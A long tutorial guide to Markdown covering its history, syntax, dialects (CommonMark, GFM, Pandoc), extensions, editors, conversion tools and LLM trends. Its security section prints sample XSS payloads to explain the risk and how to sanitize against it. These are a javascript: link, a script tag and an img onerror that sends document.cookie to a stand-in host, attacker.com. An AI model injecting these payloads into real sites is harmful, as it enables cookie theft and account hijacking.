Saw Tools

Markdown: the complete guide from syntax to professional tools

History, basic and advanced syntax, CommonMark/GFM dialects, MDX, Mermaid, Obsidian, Pandoc, security, and 2026 trends. With practical examples throughout.

1. The history of Markdown: from email to universal standard

Markdown was born in 2004 from a collaboration between John Gruber (author of the Daring Fireball blog) and Aaron Swartz, developer, free software activist, and co-founder of Reddit. The original intent was elegant in its simplicity: to let anyone write prose that converts cleanly to HTML as naturally as writing a plain-text email. Gruber's guiding idea was that Markdown syntax should be intuitive even before rendering: raw Markdown text should "look" formatted to the naked eye.

The founding philosophy is spelled out in Gruber's original documentation: "The overriding design goal for Markdown's formatting syntax is to make it as readable as possible. The idea is that a Markdown-formatted document should be publishable as-is, as plain text, without looking like it's been marked up with tags or formatting instructions." This native readability is what distinguishes Markdown from languages like reStructuredText or AsciiDoc — and explains its meteoric adoption.

For its first five years, Markdown remained a niche tool, used mainly by developers and technical bloggers. The explosion happened around 2008–2010, driven by two major platforms:

  • GitHub (launched 2008) adopted Markdown as the native format for READMEs, issues, pull requests, and wikis. Overnight, millions of developers learned Markdown because it was the format of their daily tool.
  • Stack Overflow (launched 2008) used Markdown for questions and answers. The global tech community learned to write it naturally.

The 2010s saw Markdown colonize every corner of the tech ecosystem: Jekyll (2008) and Hugo for static blogs, Slate and Swagger for API documentation, Reddit for comments, Slack and Discord for chat, Jupyter Notebooks for data science, and dozens of other tools. In 2014, faced with the proliferation of incompatible dialects, John MacFarlane (author of Pandoc) and a group of contributors published the CommonMark specification — a formal attempt to standardize what Gruber had deliberately left under-specified.

By 2026, Markdown is the de facto universal format for technical writing. Large language models (LLMs) produce it by default. The most popular SaaS editors (Notion, Linear, Coda) integrate it natively. The idea of writing documentation in raw HTML by hand has become as anachronistic as writing emails in XML.

2. Basic syntax: the fundamental building blocks

Core Markdown syntax is small enough to fit on one page. Here are the essential elements with, for each, the Markdown code and its corresponding HTML output.

Headings

Headings are created with the # character, from H1 (one #) to H6 (six #). CommonMark requires a space between the # characters and the text. Gruber's original Markdown.pl accepted headings without it, so always include the space for portability.

| Markdown | HTML output |
|:--|:--|
| `# Main heading` | `<h1>Main heading</h1>` |
| `## Subheading` | `<h2>Subheading</h2>` |
| `### Section` | `<h3>Section</h3>` |
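
The heading rule can be sketched in a few lines of Python. This is only an illustration, assuming the CommonMark convention that at least one space or tab follows the # characters. The helper heading_to_html is hypothetical (it is not part of any library) and ignores edge cases such as leading indentation or empty headings written as a bare #.

```python
import html
import re
from typing import Optional

# 1 to 6 '#' characters, at least one space or tab, the text,
# then an optional closing run of '#' characters.
ATX_HEADING = re.compile(r"^(#{1,6})[ \t]+(.*?)(?:[ \t]+#+)?[ \t]*$")


def heading_to_html(line: str) -> Optional[str]:
    """Convert one ATX heading line to HTML, or return None if it is not a heading."""
    match = ATX_HEADING.match(line)
    if match is None:
        return None
    level = len(match.group(1))
    text = html.escape(match.group(2), quote=False)
    return f"<h{level}>{text}</h{level}>"


print(heading_to_html("## Subheading"))
print(heading_to_html("#NoSpace"))
```

A line with seven # characters, or with no space after them, is not treated as a heading and yields None.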

Bold, italic, strikethrough

| Markdown | Renders as |
|:--|:--|
| `**bold text**` | bold text |
| `*italic text*` | italic text |
| `***bold and italic***` | bold and italic |
| `~~strikethrough~~` | strikethrough (GFM) |

Lists

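Unordered lists use -, *, or +. Ordered lists use numbers followed by a period. Indenting an item creates a nested list: in CommonMark the nested item must line up at least with the parent item's text (2 spaces under "- ", 3 spaces under "1. "), and 4 spaces works under both.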

Markdown (unordered list with a nested item):
- Item A
- Item B
  - Sub-item

Generated HTML:
<ul>
  <li>Item A</li>
  <li>Item B
    <ul><li>Sub-item</li></ul>
  </li>
</ul>

Markdown (ordered list):
1. First
2. Second
3. Third

Generated HTML:
<ol>
  <li>First</li>
  <li>Second</li>
  <li>Third</li>
</ol>

Links and images

# Link
[link text](https://example.com "optional title")

# Image
![alt text](https://example.com/image.png "optional title")

# Reference-style link (useful for reuse)
See [the documentation][doc-ref].

[doc-ref]: https://example.com/doc

Inline code and code blocks

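Inline code uses single backticks. Original Markdown only knows code blocks indented by 4 spaces; fenced blocks delimited by three backticks come from later dialects and are standardized in CommonMark. A language identifier after the opening backticks lets renderers such as GitHub apply syntax highlighting.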

# Inline code
Use the `git status` command to see the current state.

# Code block with syntax highlighting (GFM)
```python
def greet(name):
    return f"Hello, {name}!"
```

Blockquotes and horizontal rules

# Blockquote
> This is a blockquote.
> It can span multiple lines.
>
> And contain multiple paragraphs.

# Horizontal rule
---
or
***

3. Advanced syntax

Tables (GFM)

Tables are not part of original Markdown — they are defined by the GFM specification. The syntax uses pipes | and a separator line with dashes. Colons in the separator line control alignment.

| Column 1      | Column 2      | Column 3     |
|:------------- |:-------------:| ------------:|
| left-aligned  | centered      | right-aligned |
| value         | value         | value        |

Rendering: column 1 is left-aligned (:---), column 2 is centered (:---:), column 3 is right-aligned (---:).
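
To make the alignment rule concrete, here is a minimal Python sketch that reads a separator line and reports the alignment of each column. The function name parse_alignments and the label "default" for cells without colons are assumptions made for this example; real parsers handle more edge cases (escaped pipes, missing outer pipes, and so on).

```python
import re

# One separator cell: optional colon, one or more dashes, optional colon.
SEPARATOR_CELL = re.compile(r":?-+:?")


def parse_alignments(separator_line: str) -> list[str]:
    """Return the alignment of each column described by a table separator line."""
    cells = separator_line.strip().strip("|").split("|")
    alignments = []
    for raw_cell in cells:
        cell = raw_cell.strip()
        if not SEPARATOR_CELL.fullmatch(cell):
            raise ValueError(f"not a valid separator cell: {raw_cell!r}")
        starts, ends = cell.startswith(":"), cell.endswith(":")
        if starts and ends:
            alignments.append("center")
        elif ends:
            alignments.append("right")
        elif starts:
            alignments.append("left")
        else:
            alignments.append("default")  # no colon: alignment left to the renderer
    return alignments


print(parse_alignments("|:------------- |:-------------:| ------------:|"))
```

Applied to the separator line of the table above, the function reports left, center, and right, in that order.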

Footnotes

Supported by MultiMarkdown, Pandoc, and many other parsers, but defined neither in CommonMark nor in the GFM specification (GitHub itself has rendered footnotes since 2021).

Here is an important claim.[^1]

[^1]: The source of this claim is a 2023 research paper.

Task lists (GFM)

- [x] Completed task
- [ ] Task in progress
- [ ] Task to do
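
Because task lists are plain text, progress can be computed without rendering anything. The following Python sketch counts checked and unchecked items; the function name task_progress is hypothetical, and the pattern assumes one item per line with a -, *, or + marker.

```python
import re

# A list marker, then "[ ]" or "[x]" (either case), then the task text.
TASK_ITEM = re.compile(r"^\s*[-*+]\s+\[( |x|X)\]\s+(.*)$")


def task_progress(markdown_text: str) -> tuple[int, int]:
    """Return (completed, total) for the task list items found in the text."""
    done = total = 0
    for line in markdown_text.splitlines():
        match = TASK_ITEM.match(line)
        if match is None:
            continue
        total += 1
        if match.group(1).lower() == "x":
            done += 1
    return done, total


sample = "- [x] Completed task\n- [ ] Task in progress\n- [ ] Task to do"
print(task_progress(sample))
```

For the three items shown above, the result is one completed task out of three.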

Definition lists

Supported by Pandoc and PHP Markdown Extra, not supported by CommonMark/GFM:

Term
:   Definition of the term on one line.
:   Alternative definition.

Inline HTML

CommonMark allows raw HTML inside Markdown files. Leave a blank line before and after an HTML block. Avoid nesting Markdown inside HTML tags: text placed directly inside an HTML block is passed through as-is, and parsers differ on when they resume Markdown processing.

Normal Markdown paragraph.

<div class="alert">
  This content is pure HTML — no Markdown here.
</div>

Another Markdown paragraph.

Escaping special characters

To display a Markdown character literally, prefix it with a backslash \. Original Markdown lets you escape these characters: \ ` * _ { } [ ] ( ) # + - . ! (CommonMark extends this to any ASCII punctuation character).

\*This text is not italic\*
\[This is not a link\]
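
When Markdown is generated by a program (for example, inserting a user's name into a template), escaping is usually done in code. The sketch below is a deliberately conservative Python example: it escapes every character from the list above, even where the character would be harmless. The name escape_markdown is an assumption for this example, not a library function.

```python
import re

# The characters that original Markdown allows to be backslash-escaped.
MARKDOWN_SPECIALS = "\\`*_{}[]()#+-.!"
_ESCAPE_RE = re.compile("([" + re.escape(MARKDOWN_SPECIALS) + "])")


def escape_markdown(text: str) -> str:
    """Prefix every Markdown special character with a backslash."""
    return _ESCAPE_RE.sub(r"\\\1", text)


print(escape_markdown("*This text is not italic*"))
print(escape_markdown("[This is not a link]"))
```

The output over-escapes on purpose (a period inside a sentence does not need a backslash), which keeps the function simple at the cost of noisier source text.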

4. The dialect problem: CommonMark vs GFM vs MultiMarkdown

One of the most frequent sources of confusion with Markdown is the proliferation of "dialects" — mutually incompatible variants. Understanding why this happened is essential to using Markdown without unpleasant surprises.

Why original Markdown was problematic

John Gruber published Markdown with prose documentation and a reference implementation in Perl — but without a formal specification. Dozens of edge cases were left undefined: what happens with nested lists whose indentation is inconsistent? With malformed HTML? With nested links? Each implementation made its own decision.

The result: a Markdown document that rendered correctly in one tool could produce a completely different output in another. This incompatibility became a serious problem as Markdown was adopted at scale.

CommonMark: the standardization attempt (2014)

In 2014, John MacFarlane (author of Pandoc), Jeff Atwood (co-founder of Stack Overflow), and others published the CommonMark specification — a formal spec with an exhaustive test suite. The goal: any conformant CommonMark parser produces the same HTML from the same input.

CommonMark is available at spec.commonmark.org. Version 0.31.2 (January 2024) contains 652 examples that double as conformance tests. Major parsers built around the spec include cmark (the C reference implementation), markdown-it, marked (which tracks the spec closely), and many others. CommonMark does not define tables, footnotes, or task lists: those are extensions.

GitHub Flavored Markdown (GFM)

Published in 2017, the GFM specification is a strict superset of CommonMark. It adds five extensions: tables, strikethrough text (~~), task lists (- [x]), extended autolinks (bare URLs become clickable links), and a filter that neutralizes a short list of dangerous raw HTML tags such as <script>. The GFM spec is available at github.github.com/gfm.

GFM is today the most widely used Markdown dialect, used by GitHub, GitLab, Gitea, Jira, and dozens of other development tools. When someone says "Markdown" without specifying, they usually mean GFM.

Pandoc Markdown

Pandoc's default dialect is its own extended version of original Markdown (CommonMark and GFM are also available as input formats), with dozens of optional extensions: footnotes, definition lists, fenced code blocks, multi-line tables, attributes on headings, and more. It is the most expressive version of Markdown, ideal for long-form writing and academic publishing.

MultiMarkdown

Created by Fletcher T. Penney, MultiMarkdown adds footnotes, tables, citations, metadata variables in the header, and math formula support. It is popular in the macOS world (iA Writer and Ulysses both support MultiMarkdown).

How to find out which dialect your tool uses

The practical rule: check your tool's documentation. Most now specify whether they follow CommonMark, GFM, or something else. When in doubt, test with a table and a task list — if both work, you likely have GFM or a superset.
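
The table-and-task-list test can be automated once you have the HTML your tool produces. The Python sketch below assumes you paste PROBE_MARKDOWN into the tool and capture its output yourself; the names PROBE_MARKDOWN, detect_features, and looks_like_gfm are hypothetical, and the string checks are heuristics, not a conformance test.

```python
import re

# Probe document: render it with the tool under test and capture the HTML.
PROBE_MARKDOWN = "\n".join([
    "| a | b |",
    "|---|---|",
    "| 1 | 2 |",
    "",
    "- [x] done",
    "- [ ] todo",
])


def detect_features(rendered_html: str) -> dict[str, bool]:
    """Report which probe features appear to have been rendered."""
    lowered = rendered_html.lower()
    return {
        "tables": "<table" in lowered,
        "task_lists": re.search(r"type=[\"']?checkbox", lowered) is not None,
    }


def looks_like_gfm(rendered_html: str) -> bool:
    """True when both the table and the task list were rendered."""
    return all(detect_features(rendered_html).values())
```

If either feature comes back False, the tool is probably running plain CommonMark or original Markdown, and GFM-only syntax should be avoided or enabled through an extension.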

5. Extended Markdown: MDX, LaTeX, Mermaid, Obsidian

MDX: Markdown + JSX

MDX is an extension that allows JSX components (most commonly React) to be used inside Markdown files. It is supported, natively or through official integrations, by modern site frameworks and generators such as Next.js, Astro, Gatsby, and Docusaurus v3.

import { Chart } from '../components/Chart'

# My article with React components

Here is an interactive chart:

<Chart data={[1, 2, 3, 4]} />

And here the Markdown text continues normally.

MDX enables truly interactive documentation — component previews, code sandboxes, interactive charts — while preserving Markdown readability for textual content. It is today the de facto standard for design systems and modern technical documentation.

Markdown + LaTeX for mathematical formulas

Most Markdown parsers do not include mathematical rendering natively. The standard approach is to use KaTeX or MathJax alongside, with LaTeX syntax delimited by dollar signs:

# Inline formula
Einstein's equation: $E = mc^2$

# Centered display formula
$$
\int_{-\infty}^{+\infty} e^{-x^2} dx = \sqrt{\pi}
$$

This syntax is natively supported by Jupyter Notebooks, Obsidian, Pandoc, and most academic tools. On GitHub, $...$ and $$...$$ formulas have been rendered natively since 2022.

Mermaid: diagrams in Markdown

Mermaid is a JavaScript library that creates diagrams from a textual syntax embedded in Markdown code blocks with the mermaid identifier. GitHub has rendered it natively since 2022.

```mermaid
flowchart LR
    A[Write in Markdown] --> B{Convert}
    B --> C[HTML]
    B --> D[PDF]
    B --> E[DOCX]
```

Mermaid supports flowcharts, sequence diagrams, UML class diagrams, Gantt charts, decision trees, and more. It is a remarkable tool for technical documentation because diagrams are plain-text files that are versionable in git.
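
Since a Mermaid diagram is just a fenced block with a particular identifier, a build script can pull diagrams out of a document before handing them to a renderer. The Python sketch below shows one simple way to do that, assuming fences made of exactly three backticks; extract_fenced_blocks is a hypothetical helper, and it does not call Mermaid itself.

```python
FENCE = "`" * 3  # three backticks, built this way to keep the example easy to embed


def extract_fenced_blocks(markdown_text: str, language: str) -> list[str]:
    """Return the contents of every fenced block tagged with the given identifier."""
    blocks: list[str] = []
    current = None  # lines of the block being collected, or None when outside one
    for line in markdown_text.splitlines():
        stripped = line.strip()
        if current is None:
            # An opening fence followed by the requested identifier starts a block.
            if stripped.startswith(FENCE) and stripped[len(FENCE):].strip() == language:
                current = []
        elif stripped == FENCE:
            blocks.append("\n".join(current))
            current = None
        else:
            current.append(line)
    return blocks


document = f"Intro\n\n{FENCE}mermaid\nflowchart LR\n    A --> B\n{FENCE}\n\nOutro\n"
print(extract_fenced_blocks(document, "mermaid"))
```

Blocks tagged with another identifier (python, for instance) are skipped, so the same function can be reused for any language.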

Obsidian notation: wikilinks and callouts

Obsidian uses extended Markdown syntax with several proprietary additions that have become popular in other tools (Logseq, Foam):

# Wikilinks — internal links to other notes
See my note on [[Markdown Syntax]] or section [[Guide#Installation]].

# Callouts (styled alert blocks)
> [!info] Information
> This callout displays information in blue.

> [!warning] Warning
> This callout displays a warning in orange.

> [!tip] Tip
> Callouts support Markdown inside them.

Obsidian callouts are not a standard — they are ignored or displayed as ordinary blockquotes in other parsers. If you're writing for a specific platform (GitHub, an SSG), verify compatibility before using them extensively.
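
If notes written with wikilinks must be published on a platform that only understands standard links, a small conversion step helps. The Python sketch below rewrites wikilinks as ordinary Markdown links. Several things here are assumptions for illustration: that each note lives in a file named after the note with a .md extension, that heading anchors can be reused verbatim (many platforms slugify them differently), and that the [[Note|alias]] form should use the alias as link text.

```python
import re
from urllib.parse import quote

# [[Note]], [[Note#Heading]], or [[Note|alias]]
WIKILINK = re.compile(r"\[\[([^\]|#]+)(?:#([^\]|]+))?(?:\|([^\]]+))?\]\]")


def wikilinks_to_markdown(text: str) -> str:
    """Rewrite wikilinks as standard Markdown links (assumed layout: Note -> Note.md)."""

    def replace(match: re.Match) -> str:
        note, heading, alias = match.groups()
        label = alias or (f"{note} > {heading}" if heading else note)
        target = quote(note.strip()) + ".md"
        if heading:
            target += "#" + quote(heading.strip())
        return f"[{label}]({target})"

    return WIKILINK.sub(replace, text)


print(wikilinks_to_markdown("See [[Markdown Syntax]] or [[Guide#Installation]]."))
```

Spaces in note names are percent-encoded so the resulting link destination stays valid in CommonMark.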

6. The ecosystem: editors and platforms

The Markdown editor landscape in 2026 is rich and diverse. Each tool has a different positioning — here are the main ones.

Typora — the WYSIWYG editor that changed habits

Typora was one of the first Markdown editors to offer a truly WYSIWYG mode: you write Markdown and the rendering instantly replaces the syntax, with no separate "preview" mode. The Markdown syntax remains editable (clicking an element reveals the underlying syntax). Available on macOS, Windows, and Linux, paid ($15 one-time). Supports tables, LaTeX, Mermaid, and CSS themes. Ideal for those who want Markdown's power without seeing the syntax day-to-day.

Obsidian — the Markdown-first PKM

In a few years, Obsidian has become one of the most influential note-taking tools in the tech ecosystem. Its central principle: all your notes are .md files on your disk, never locked in a proprietary database. The "knowledge graph" feature visualizes links between your notes. An ecosystem of plugins (850+ community plugins) massively extends functionality: git sync, visual canvas, Dataview (queries on notes), Templater, embedded Excalidraw. The base version is free; Obsidian Sync (encrypted synchronization on their servers) is paid.

Notion — the proprietary variant that won the mainstream

Notion uses a Markdown-inspired but proprietary syntax: you can type # to create a heading or - for a list, but files are not stored as .md. Markdown export is unreliable (advanced blocks like databases do not export cleanly). Notion excels for team collaboration, visual databases, and project organization — but if data portability is a priority, choose a Markdown-first tool.

VS Code — the universal editor with built-in preview

VS Code integrates a native Markdown preview (Ctrl+Shift+V or the "Open Preview" button). The Markdown All in One extension adds automatic table of contents, formatting shortcuts, and list numbering. It is the tool of choice for developers writing documentation alongside code, especially thanks to git integration and the built-in terminal.

iA Writer — the long-form writing tool

iA Writer is designed for distraction-free writing — a stripped-down interface centered on text. It supports MultiMarkdown and has a unique feature, "Focus Mode," which dims everything except the sentence currently being written. Popular among journalists and technical writers. Available on macOS, iOS, Windows, and Android.

Logseq — the open-source Obsidian alternative

Logseq is an outliner (hierarchical list editor) that uses Markdown as its storage format. Key difference from Obsidian: each note is structured as a block outline, not a linear document. Logseq is fully open source (AGPL) and particularly well-suited for project management and structured note-taking. Files are portable .md files.

Joplin — the open-source encrypted note manager

Joplin stores notes in Markdown, supports end-to-end encryption, and syncs via Dropbox, Nextcloud, or its own server. It is the privacy-first alternative to Evernote or Notion for personal use.

7. Converting Markdown to HTML, PDF, and DOCX

A .md file is plain text. To publish it, print it, or share it with someone who doesn't use Markdown, you need to convert it. The options are plentiful.

Pandoc: the Swiss army knife of conversion

Pandoc is the reference tool for all document conversion. It reads Markdown (multiple configurable dialects), HTML, reStructuredText, LaTeX, DOCX, EPUB, and dozens of other formats, and can convert them to just as many targets.

# Markdown to HTML
pandoc article.md -o article.html

# Markdown to PDF (via LaTeX — requires TeX installed)
pandoc article.md -o article.pdf

# Markdown to DOCX (Word)
pandoc article.md -o article.docx

# Markdown to EPUB
pandoc article.md --metadata title="My Book" -o book.epub

# With custom template and table of contents
pandoc article.md --toc --template=my-template.html -o article.html

Pandoc is indispensable for academic publishing and technical documentation. It supports footnotes, bibliographic citations (via BibTeX or CSL), LaTeX formulas, and Mermaid diagrams (with filters).
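
In a build script, the same commands are often wrapped in a few lines of code. The Python sketch below assembles and runs a Pandoc command using only the options shown above (-o, --toc, --template). The function names build_pandoc_command and convert are hypothetical, and the sketch assumes the pandoc executable is installed and on the PATH.

```python
import shutil
import subprocess
from typing import Optional


def build_pandoc_command(source: str, target: str, toc: bool = False,
                         template: Optional[str] = None) -> list[str]:
    """Assemble the argument list for a Pandoc conversion."""
    command = ["pandoc", source, "-o", target]
    if toc:
        command.append("--toc")
    if template is not None:
        command.append(f"--template={template}")
    return command


def convert(source: str, target: str, **options) -> None:
    """Run Pandoc and raise if it is missing or exits with an error."""
    if shutil.which("pandoc") is None:
        raise RuntimeError("pandoc executable not found on PATH")
    subprocess.run(build_pandoc_command(source, target, **options), check=True)


print(build_pandoc_command("article.md", "article.html", toc=True))
```

Passing the arguments as a list rather than a single shell string avoids quoting problems when file names contain spaces.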

markdown-it (JavaScript/Node.js)

markdown-it is the reference JavaScript Markdown parser, used by VS Code, GitLab, and hundreds of other tools. It is fast, modular (extensions via plugins), and configurable. CommonMark-conformant. Usable server-side (Node.js) and client-side (browser).

const md = require('markdown-it')({
  html: false,        // disable inline HTML (security)
  linkify: true,      // autolinks
  typographer: true   // typographic quotes
})
const result = md.render('# Hello\n\nThis is **Markdown**.')

marked.js (JavaScript — simple and fast)

marked is one of the most popular JavaScript Markdown parsers (millions of npm downloads per week). Simple to integrate, supports GFM by default. Less modular than markdown-it but sufficient for 95% of web use cases.

import { marked } from 'marked'
// marked.parse() is the documented entry point; GFM is enabled by default
const html = marked.parse('# Title\n\nText with **bold**.')

python-markdown (Python)

The most widely used Python package for Markdown rendering (a third-party library installed from PyPI as markdown, not part of the standard library). Its many extensions (tables, fenced_code, footnotes, toc, etc.) are activated individually. Used by MkDocs for documentation.

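import markdown

# Sample input; in practice this would be read from a .md file
text = "# Title\n\nA claim with a footnote.[^1]\n\n[^1]: The note."

# Each extension is opted into by name
html = markdown.markdown(
    text,
    extensions=['tables', 'fenced_code', 'footnotes', 'toc']
)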

Why rendering varies between parsers

The question comes up regularly: "My Markdown looks fine in Obsidian but not on GitHub." The cause is almost always a different dialect. Some practical rules to minimize surprises:

  • Avoid non-GFM extensions (definition lists, advanced footnotes) if your content targets GitHub.
  • Always test in the destination tool, not just in your local editor.
  • Use our online Markdown converter to verify the HTML rendering of your syntax in real time.
  • For serious projects, explicitly set the dialect in your tool's configuration (e.g., gfm: true in marked's config).

8. Markdown in the professional workflow

READMEs and GitHub documentation

The README.md file at the root of a GitHub repository is the project's front page — it is automatically rendered with GFM. Current conventions include: badges (build status, coverage, license), screenshots, copyable installation instructions, and feature tables. A well-crafted README in GFM can significantly improve an open-source project's adoption.

Technical documentation with SSGs

Markdown-based documentation site generators have become the industry standard:

  • Docusaurus (Meta, React): MDX, versioning, i18n, Algolia search. Standard in the JS ecosystem.
  • MkDocs + Material Theme (Python): simple, elegant, highly customizable. Standard in Python and DevOps ecosystems.
  • VitePress (Vue.js): very fast, built on Vue 3 and Vite, with Vue components usable directly in Markdown (it does not use MDX). Used by Vue, Vite, and dozens of major JS projects.
  • Starlight (Astro): the newcomer, with fast static builds and MDX support through Astro's integration.

Static blogs

Hugo (Go) and Jekyll (Ruby) were the pioneers of the Markdown static blog. By 2026, Astro (with its Content Collections API) and Next.js dominate new projects thanks to MDX support and access to the React ecosystem. The typical workflow: write Markdown locally, commit with git, and let Netlify or Vercel deploy automatically.

Changelogs and release notes

The Keep a Changelog format (keepachangelog.com) standardizes CHANGELOG.md files with "Added / Changed / Deprecated / Removed / Fixed / Security" sections per version. The Conventional Commits convention allows these changelogs to be generated automatically from commit messages.
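
As an illustration of that automation, the Python sketch below turns a list of commit subjects into one changelog entry. The mapping from commit types to sections (feat to Added, fix to Fixed, perf and refactor to Changed) is an assumption made for this example: neither convention prescribes it, and real tools make it configurable. The function name render_changelog is hypothetical.

```python
import re
from collections import defaultdict

# Conventional Commits subject: type, optional (scope), optional "!", then ": description"
COMMIT = re.compile(r"^(?P<type>[a-z]+)(?:\([^)]*\))?!?: (?P<description>.+)$")

# Assumed mapping from commit type to Keep a Changelog section.
SECTION_FOR_TYPE = {"feat": "Added", "fix": "Fixed", "perf": "Changed", "refactor": "Changed"}
SECTION_ORDER = ["Added", "Changed", "Deprecated", "Removed", "Fixed", "Security"]


def render_changelog(version: str, date: str, commit_subjects: list[str]) -> str:
    """Render one changelog entry from a list of commit subject lines."""
    sections = defaultdict(list)
    for subject in commit_subjects:
        match = COMMIT.match(subject)
        if match is None:
            continue  # not a Conventional Commit: left out of the changelog
        section = SECTION_FOR_TYPE.get(match.group("type"))
        if section is not None:
            sections[section].append(match.group("description"))
    lines = [f"## [{version}] - {date}"]
    for name in SECTION_ORDER:
        if name in sections:
            lines += ["", f"### {name}"] + [f"- {item}" for item in sections[name]]
    return "\n".join(lines)


print(render_changelog("1.2.0", "2026-01-15",
                       ["feat(parser): support tables", "fix: escape pipes in cells"]))
```

Commit types without a mapped section (chore, docs, and so on) are silently skipped in this sketch.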

Meeting notes and internal documentation

Markdown has established itself as the preferred format for meeting notes in tech teams. The advantages: versionable in git, readable without any specific tool, convertible to PDF for non-tech stakeholders, and easily integrated into wikis (Confluence supports Markdown, GitLab Wiki is natively Markdown).

9. Markdown security: the often-overlooked XSS risk

Markdown is often perceived as "harmless" because it is text. This is a mistake. When user-supplied Markdown content is rendered in a browser without precautions, it can introduce serious XSS (Cross-Site Scripting) vulnerabilities.

The attack vector

CommonMark allows raw HTML in Markdown. If your application renders third-party users' Markdown content without sanitization, an attacker can inject:

# XSS injection in Markdown
Here is an innocent link: [click here](javascript:alert('XSS'))

Or direct HTML:
<script>document.cookie = 'stolen=' + document.cookie</script>

Or more subtle:
<img src="x" onerror="fetch('https://attacker.com/?c='+document.cookie)">

How to protect yourself

Best practices in 2026 are clear:

  1. Disable inline HTML in your parser if you don't need it. In markdown-it: html: false. marked no longer offers a built-in switch (its old sanitize: true option was deprecated and later removed), so run DOMPurify on its output.
  2. Sanitize the produced HTML with DOMPurify client-side, or with sanitize-html (Node.js) or bleach (Python) server-side. Note that bleach has been deprecated since 2023; nh3 is a maintained alternative. Apply this sanitization after Markdown rendering, on the final HTML.
  3. Watch out for dangerous URL schemes in links (javascript:, vbscript:, data:). DOMPurify removes javascript: URLs by default, but verify how your sanitizer treats data: URLs, which are sometimes allowed for images.
  4. Watch out for image tokens: a remote image in Markdown rendered server-side can reveal the server's IP to an attacker via a GET request. For HTML emails generated from Markdown, it may also confirm the email was opened (pixel tracking).
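
The URL-scheme check from point 3 can be sketched as an allowlist. The Python example below is a complement to a real HTML sanitizer, not a replacement for one; the function name is_safe_link and the choice of allowed schemes (http, https, mailto, plus relative URLs) are assumptions for this example.

```python
from urllib.parse import urlsplit

# Schemes accepted in links; everything else (javascript:, vbscript:, data:, ...) is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def is_safe_link(url: str) -> bool:
    """Return True for relative URLs and for URLs whose scheme is on the allowlist."""
    # Browsers ignore surrounding whitespace and embedded tabs or newlines,
    # so remove them before looking at the scheme.
    cleaned = "".join(ch for ch in url.strip() if ch not in "\t\r\n")
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


print(is_safe_link("https://example.com"))
print(is_safe_link("javascript:alert('XSS')"))
```

An allowlist is preferable to a blocklist here: new or obscure schemes are rejected by default instead of slipping through.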

Note: if your Markdown content is entirely written by you or by trusted authors (static documentation, blog, README), the XSS risk is negligible, since no untrusted input reaches the renderer. The risk is specific to applications that allow third parties to submit Markdown (comments, collaborative wikis, multi-author CMSs).

Recommended parsers and configurations for public rendering

| Parser | Secure configuration |
|:--|:--|
| markdown-it | { html: false } + DOMPurify on output |
| marked | DOMPurify required on HTML output |
| python-markdown | bleach.clean() on output |
| Pandoc | --sandbox flag (Pandoc 2.17+) |

10. Trends 2026: convergence, LLMs, and Markdown-first

Convergence toward CommonMark + GFM

The market has progressively aligned on CommonMark + GFM extensions as the de facto standard. Major parsers (markdown-it, marked, Pandoc in GFM mode) are now conformant. Platforms (GitHub, GitLab, Linear, Jira, Notion) all support the GFM subset. The "dialect wars" of the 2010s are fading.

The triumph of Markdown-first tools

Obsidian surpassed 1.5 million users in 2025. Bear, iA Writer, Logseq, and Craft all show sustained growth. The idea of owning one's notes in portable files is regaining ground against proprietary SaaS in the post-pandemic era. The "PKMS" (Personal Knowledge Management Systems) trend has popularized Markdown among non-developer audiences.

Markdown as the universal format for LLMs

This may be the most structurally significant trend of 2025–2026: large language models produce Markdown by default. ChatGPT, Claude, Gemini, Mistral — all format their responses in Markdown. The reasons are multiple:

  • Markdown is massively represented in training corpora (GitHub, Stack Overflow, open-source documentation, Reddit).
  • Its textual syntax encodes semantic structure (hierarchy, emphasis, code) in a way that the model can learn and reproduce.
  • The interfaces that display these models (Claude.ai, ChatGPT, API interfaces) know how to render Markdown natively.
  • Markdown has become the standard export format for LLM conversations — a structured, portable, versionable document.

In 2026, RAG (Retrieval-Augmented Generation) pipelines use Markdown as the pivot format: documents are chunked on Markdown heading boundaries, generated responses are in Markdown, and prompt engineering systems use Markdown to structure instructions to models.
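
Chunking on heading boundaries is simple enough to sketch in plain Python. The example below splits a document into one chunk per heading and skips # characters that appear inside fenced code blocks. The function name chunk_by_headings and the chunk shape (a dict with title and text) are assumptions for this example; production pipelines usually add size limits and keep the heading hierarchy.

```python
import re

FENCE = "`" * 3  # three backticks
HEADING = re.compile(r"^(#{1,6})[ \t]+(.+?)[ \t]*$")


def chunk_by_headings(markdown_text: str) -> list[dict[str, str]]:
    """Split a Markdown document into chunks, one per heading."""
    chunks: list[dict[str, str]] = []
    title, body = "", []
    in_fence = False

    def flush() -> None:
        # Store the current chunk unless it is completely empty.
        if title or any(line.strip() for line in body):
            chunks.append({"title": title, "text": "\n".join(body).strip()})

    for line in markdown_text.splitlines():
        if line.lstrip().startswith(FENCE):
            in_fence = not in_fence  # '#' lines inside code blocks are not headings
        match = None if in_fence else HEADING.match(line)
        if match:
            flush()
            title, body = match.group(2), []
        else:
            body.append(line)
    flush()
    return chunks


doc = "# Guide\nIntro.\n\n## Install\nRun the installer.\n"
for chunk in chunk_by_headings(doc):
    print(chunk)
```

Text that appears before the first heading is kept as a chunk with an empty title, so no content is dropped.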

Markdown in generative AI: concrete use cases

Beyond conversations, Markdown integrates into new AI workflows: automated code documentation generation (GitHub Copilot writes READMEs in Markdown), AI agents that create structured reports, transcription tools that produce meeting summaries in Markdown. The boundary between "human writing format" and "machine-to-machine communication format" is blurring in Markdown's favor.

11. Conclusion: Markdown, the format you were already using without knowing it

If you have ever written a README on GitHub, formatted a message in Slack or Discord, written an answer on Stack Overflow, or received a response from an LLM, you have already consumed Markdown. Its strength is not in a spectacular feature, but in its quiet ubiquity.

The central lesson of this guide: Markdown is not a single format — it is a family of formats sharing a core syntax. Understanding the dialects (CommonMark, GFM, Pandoc) and knowing which parser your tool uses avoids 80% of surprises. The rest — MDX, Mermaid, LaTeX, Obsidian — are extensions that enrich Markdown to suit specific needs without betraying its founding principle: text that is readable before it is ever rendered.

To convert your Markdown files to HTML immediately, use our online Markdown converter — free, no sign-up required, no data stored server-side. You can also explore our Base64 encoder/decoder to understand how textual data is encoded in web pipelines, or our color converter for designers working on their CSS alongside their Markdown documentation.

Frequently asked questions

What is the difference between CommonMark and GitHub Flavored Markdown?

